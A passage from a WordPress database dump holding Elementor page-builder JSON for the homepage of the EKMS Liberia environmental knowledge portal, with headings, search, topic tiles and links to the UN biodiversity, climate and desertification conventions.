later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_marine.jpg\",\"id\":2158},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\",\"items_text_typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(19129,2799,'_elementor_version','2.7.5'),(19130,2799,'_elementor_template_type','wp-page'),(19131,2799,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(19135,2800,'_wp_page_template','default'),(19136,2800,'_elementor_edit_mode','builder'),(19137,2800,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\",\"background_slideshow_slide_transition\":\"slide_left\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.04)\",\"padding\":{\"unit\":\"px\",\"top\":\"130\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#014421\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":65},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_font_family\":\"Roboto\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1999999999999999555910790149937383830547332763671875,\"sizes\":[]},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"